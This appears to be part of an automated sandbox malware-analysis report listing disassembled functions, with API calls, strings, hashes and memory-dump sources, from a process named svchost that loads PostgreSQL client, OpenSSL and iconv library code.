                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$__acrt_iob_funcisuppertolower$_strdupfputclibintl_gettextsetlocale
                                                                                            • String ID: POSIX$could not determine encoding for locale "%s": codeset is "%s"$require
                                                                                            • API String ID: 1541619466-2821463991
                                                                                            • Opcode ID: 2d925876269e9c979c64e30d574db976658d2537e890b25a58763149c12f48b0
                                                                                            • Instruction ID: 8568252037fea7d3c7270245b4b9f35589e116962e99246334cd7db198f5da05
                                                                                            • Opcode Fuzzy Hash: 2d925876269e9c979c64e30d574db976658d2537e890b25a58763149c12f48b0
                                                                                            • Instruction Fuzzy Hash: CA417111B0B70241F955975AA53627963A3AF44BD0F0C6134DE0D677DBEE7EE8418308
                                                                                            Function 660130F0 Relevance: 19.6, APIs: 13, Instructions: 122COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1cee5af0043d3d14253abd7487f399c56c7ec4a189c54a7ab216a6dd0e2c10d
                                                                                            • Instruction ID: 83e2f48b8e17a9ea3244f8c933bd013bedba2ac0acae0438283bec6c705ba1b9
                                                                                            • Opcode Fuzzy Hash: c1cee5af0043d3d14253abd7487f399c56c7ec4a189c54a7ab216a6dd0e2c10d
                                                                                            • Instruction Fuzzy Hash: 533133B690D1929AD7296BF8C81279DFF518B5F398FC00733DA18822D5C39ACE49CB41
                                                                                            Function 00007FFDA36ED8E0 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 211COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36ECBA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36ECBB1
                                                                                              • Part of subcall function 00007FFDA36ECBA0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36ECBEE
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EDADD
                                                                                            • libintl_gettext.LIBINTL-9 ref: 00007FFDA36EDAF2
                                                                                            • libintl_gettext.LIBINTL-9 ref: 00007FFDA36EDB34
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EDB3F
                                                                                              • Part of subcall function 00007FFDA36ECD20: ERR_get_error.LIBCRYPTO-3-X64 ref: 00007FFDA36ECD3A
                                                                                              • Part of subcall function 00007FFDA36ECE50: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36ECE75
                                                                                              • Part of subcall function 00007FFDA36F1420: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36ED9C9), ref: 00007FFDA36F1431
                                                                                              • Part of subcall function 00007FFDA36F1420: ERR_clear_error.LIBCRYPTO-3-X64(?,?,?,00007FFDA36ED9C9), ref: 00007FFDA36F144E
                                                                                              • Part of subcall function 00007FFDA36F1420: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36ED9C9), ref: 00007FFDA36F146F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$malloc$libintl_gettext$R_clear_errorR_get_error
                                                                                            • String ID: Client Key$SCRAM-SHA-256$%d:$Server Key$could not encode salt$could not encode server key$could not encode stored key$out of memory
                                                                                            • API String ID: 655043350-359433055
                                                                                            • Opcode ID: 19bf4ac48cda482676f6703b34b197612e28e43830431e458c3bf9adbb1ee1af
                                                                                            • Instruction ID: 06e855d295dfd39e4222a23e1cf63252d07c734517f635a0a34fdd1c15d06f5e
                                                                                            • Opcode Fuzzy Hash: 19bf4ac48cda482676f6703b34b197612e28e43830431e458c3bf9adbb1ee1af
                                                                                            • Instruction Fuzzy Hash: EF816561B0F78345FA149B25A8313BA6662AF85BC4F1C6035DE4E67787FE3EE0098704
                                                                                            Function 00007FFDA36E4460 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 171COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E4581
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E45AF
                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E45EC
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E46E3
                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000000,?,00000000,00000000,00007FFDA36E3A23), ref: 00007FFDA36E46F0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputs$__acrt_iob_funcfputcmalloc
                                                                                            • String ID: %-*s%s %s$%s%s%s$<tr><td align="left"><b>%s</b></td><td align="%s">%s</td></tr>$left$out of memory$right
                                                                                            • API String ID: 1597415195-1811498410
                                                                                            • Opcode ID: f022fe8691054bc17b551666707fe958c3d117a72318908ac244b4d7d5f19cbc
                                                                                            • Instruction ID: cb73c9196fcdae98ac51050c4908022689bbb15f7a056ddc8747a016921ad3f0
                                                                                            • Opcode Fuzzy Hash: f022fe8691054bc17b551666707fe958c3d117a72318908ac244b4d7d5f19cbc
                                                                                            • Instruction Fuzzy Hash: 0E71E461B0E6C28AFB21CF21E4253B967A2BB45B84F186031CA9D17797CF3EE4598704
                                                                                            Function 00007FFDA36EA490 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 116stringCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36F32E0: GetSystemTimePreciseAsFileTime.KERNEL32(?,?,?,00007FFDA36EA4F7), ref: 00007FFDA36F32EE
                                                                                            • _localtime64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDA36EA506
                                                                                            • strftime.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDA36EA521
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FilePreciseSystem_localtime64strftime
                                                                                            • String ID: %Y-%m-%d %H:%M:%S$%s$%s%d$%sNN$.%06u$Unknown message: %02x$mismatched message length: consumed %d, expected %d$show password_encryption
                                                                                            • API String ID: 2854911984-3289041829
                                                                                            • Opcode ID: a90116a8806ecc0ffbfeb71d5302aa1359399c38876b2c9f3cb524ba02670efc
                                                                                            • Instruction ID: 4e448a0df506a1a2958f53d2381149fe8cc0ed42337d4da601b60046bb5ac396
                                                                                            • Opcode Fuzzy Hash: a90116a8806ecc0ffbfeb71d5302aa1359399c38876b2c9f3cb524ba02670efc
                                                                                            • Instruction Fuzzy Hash: D951B372B1AA4685FB10CB65E4606FD3362BB44798F482131EE0E23796CE3EE549C744
                                                                                            Function 00007FFDA36E7DA0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 113stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_get_current_cipherstrcmp
                                                                                            • String ID: OpenSSL$cipher$compression$key_bits$library$off$protocol
                                                                                            • API String ID: 2744129671-2628787255
                                                                                            • Opcode ID: 92fcdf36734d0fb205aec8255bc14b7d24d506ab4030cabfb562e94bc9658323
                                                                                            • Instruction ID: 028934ae97fdf55048f1f476cd0788f551a9e625e42d5667249b498f2990784f
                                                                                            • Opcode Fuzzy Hash: 92fcdf36734d0fb205aec8255bc14b7d24d506ab4030cabfb562e94bc9658323
                                                                                            • Instruction Fuzzy Hash: A0418512B1F68281FA458B05E5701B92362EB85BD0F5C3031DA5E2775BEF2EE996C708
                                                                                            Function 00007FFDA36D63C0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$ContextCredentialsDeleteFreeHandleSecurityclosesocket
                                                                                            • String ID: show password_encryption
                                                                                            • API String ID: 1081927107-3405507779
                                                                                            • Opcode ID: 8946289a09cbcf4c43a48a737afeed1ce7ae3a0011d1cbfb3534ccd00b22f732
                                                                                            • Instruction ID: 7534bf109de66570f3706a5f96c0780e9954e15821344235b119d9a7ac8179ee
                                                                                            • Opcode Fuzzy Hash: 8946289a09cbcf4c43a48a737afeed1ce7ae3a0011d1cbfb3534ccd00b22f732
                                                                                            • Instruction Fuzzy Hash: 64415D32B06B8192EA5D8F61E5602A9B360FB44FA0F4C5235CB6D27795CF39F4B58318
                                                                                            Function 00007FFDA36DBA00 Relevance: 18.2, APIs: 10, Strings: 2, Instructions: 234COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: unexpected asyncStatus: %d$write to server failed
                                                                                            • API String ID: 0-2101341316
                                                                                            • Opcode ID: 2c45744ce1d0bba16ea52ea20248616da895c28e2d6741c572a82e80f7e09679
                                                                                            • Instruction ID: 6862a59be22cfb931e09764b47e761f4a403c1d031e86fe01a5b331f6d7baa8c
                                                                                            • Opcode Fuzzy Hash: 2c45744ce1d0bba16ea52ea20248616da895c28e2d6741c572a82e80f7e09679
                                                                                            • Instruction Fuzzy Hash: C8B15932B1AB8292F758DF2595202A9776AFB45F84F4C2032DE0D9779ACF3AE154C314
                                                                                            Function 00007FFDA3611430 Relevance: 18.1, APIs: 12, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_sk_freeL_sk_num$L_sk_dupL_sk_value$L_sk_set_cmp_funcL_sk_unshift
                                                                                            • String ID:
                                                                                            • API String ID: 621534355-0
                                                                                            • Opcode ID: f0d08f9c44626d6a420e869fc49c6193ca44d7cac564c57ad9a3cf6818c0e48e
                                                                                            • Instruction ID: 29ef5065200cd70251a0d753e3666247da96bcc6054e92811e03cdb31e0c17e9
                                                                                            • Opcode Fuzzy Hash: f0d08f9c44626d6a420e869fc49c6193ca44d7cac564c57ad9a3cf6818c0e48e
                                                                                            • Instruction Fuzzy Hash: F8318121B0A74246FA54EB26A43117967A3AF89BC0F0D6074EE4E57797EE3EE4108708
                                                                                            Function 00007FFDA36DA9F0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 328COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • feof.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAAC0
                                                                                            • ferror.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAAD4
                                                                                            • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAB0C
                                                                                            • feof.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAB53
                                                                                              • Part of subcall function 00007FFDA36D9780: isalpha.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36DAA61,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA36D9796
                                                                                            • feof.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAD76
                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DAD87
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DADD4
                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FFDA36D7176), ref: 00007FFDA36DADE0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: feof$fclose$_strdupferrorfgetsisalpha
                                                                                            • String ID: 5432$localhost
                                                                                            • API String ID: 1798642821-348290473
                                                                                            • Opcode ID: 092c9de2007eeb9836d3b051d1b577110671f93ea9359ed8fa820306e8131927
                                                                                            • Instruction ID: 909f8cae6e15703e6c69f7e17bd04eef9364a54a705a9ccdb700e7242c08c756
                                                                                            • Opcode Fuzzy Hash: 092c9de2007eeb9836d3b051d1b577110671f93ea9359ed8fa820306e8131927
                                                                                            • Instruction Fuzzy Hash: 15D18E13B0EA8A46FFB18E24D4702B927939F56BD5F4C6031D98D2239BDE2FD905C218
                                                                                            Function 00007FFDA36E74F0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 280COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$malloc$_strdup
                                                                                            • String ID: ...$LINE %d:
                                                                                            • API String ID: 1496848336-1733386033
                                                                                            • Opcode ID: 855007ee717508a0b981155fd2d9850b5b40592a03014f71656aa87bf42d2411
                                                                                            • Instruction ID: b64076e987cac621fdb93dabe35ee0baf9366952a916b7ab0030888b99b9ea70
                                                                                            • Opcode Fuzzy Hash: 855007ee717508a0b981155fd2d9850b5b40592a03014f71656aa87bf42d2411
                                                                                            • Instruction Fuzzy Hash: 6DC1D736B0A68286FB608F19A1603BA7792FB45784F286131DA4D57756DF3EE409CB08
                                                                                            Function 66015700 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 224COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: //IGNORE$//IGNORE$//TRANSL$//TRANSL$CP437
                                                                                            • API String ID: 2918714741-2468171555
                                                                                            • Opcode ID: 28837276f4f25ef3f45700059dea778a19c2f9cf2792603be5c1e69070d17263
                                                                                            • Instruction ID: f8bde37929f1ff6ba9fb97a06fe6f09275929b86e0b22d91b63bb497b7a530a3
                                                                                            • Opcode Fuzzy Hash: 28837276f4f25ef3f45700059dea778a19c2f9cf2792603be5c1e69070d17263
                                                                                            • Instruction Fuzzy Hash: 8391E4FAA1D780C5EB028B95E45439EFFE1E746B98F948636CA580F381DB79C089C741
                                                                                            Function 00007FFDA36D2E80 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 141COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errnofree$ContextInitializeSecuritylibintl_dgettextmalloc
                                                                                            • String ID: SSPI continuation error$SSPI returned invalid number of output buffers$out of memory$out of memory allocating SSPI buffer (%d)
                                                                                            • API String ID: 3210687015-2504083155
                                                                                            • Opcode ID: b6618783d20aa82b2f35466f3bf56a140c8222acba6ed107f6d7c3dd8583f758
                                                                                            • Instruction ID: a73ec21f7510e14cda621cf0745582a32a81e221ba2114999c28a8ba6b296601
                                                                                            • Opcode Fuzzy Hash: b6618783d20aa82b2f35466f3bf56a140c8222acba6ed107f6d7c3dd8583f758
                                                                                            • Instruction Fuzzy Hash: 8A61E53270AB8181FA608F15F4603AA7396FB84BD4F285135EA8D677A6CF3ED445CB44
                                                                                            Function 00007FFDA36F4530 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 130fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c, xrefs: 00007FFDA36F456D
                                                                                            • (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D, xrefs: 00007FFDA36F4574
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Last$CloseCreateErrorFileHandleStatus_close_open_osfhandle_setmode_wassert
                                                                                            • String ID: (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D$D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c
                                                                                            • API String ID: 3317356059-1407915
                                                                                            • Opcode ID: 3a05bbb26f22d63b270656d5914e9516d24cc1b69938084c8723307dfbb3aa89
                                                                                            • Instruction ID: 226d0217daea0491a1fdeb3ff0634132beb4d6b9440cb77c5e9eaf585d742fb0
                                                                                            • Opcode Fuzzy Hash: 3a05bbb26f22d63b270656d5914e9516d24cc1b69938084c8723307dfbb3aa89
                                                                                            • Instruction Fuzzy Hash: 0B414C22B0BA0343FB228B14AC6237D1582BB84764F1C5234DE5EA77C2DF3EE8558748
                                                                                            Function 00007FFDA36F3E00 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 95librarystringwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastLibraryLoadMessagelibintl_gettextmemsetstrerror
                                                                                            • String ID: netmsg.dll$operating system error %d$unrecognized winsock error %d$winsock error %d (could not load netmsg.dll to translate: error code %lu)
                                                                                            • API String ID: 252814119-2704675961
                                                                                            • Opcode ID: 68d3117696a1300142bdc936807f85c187c0fb69c36a8b612ef794b28a2c2579
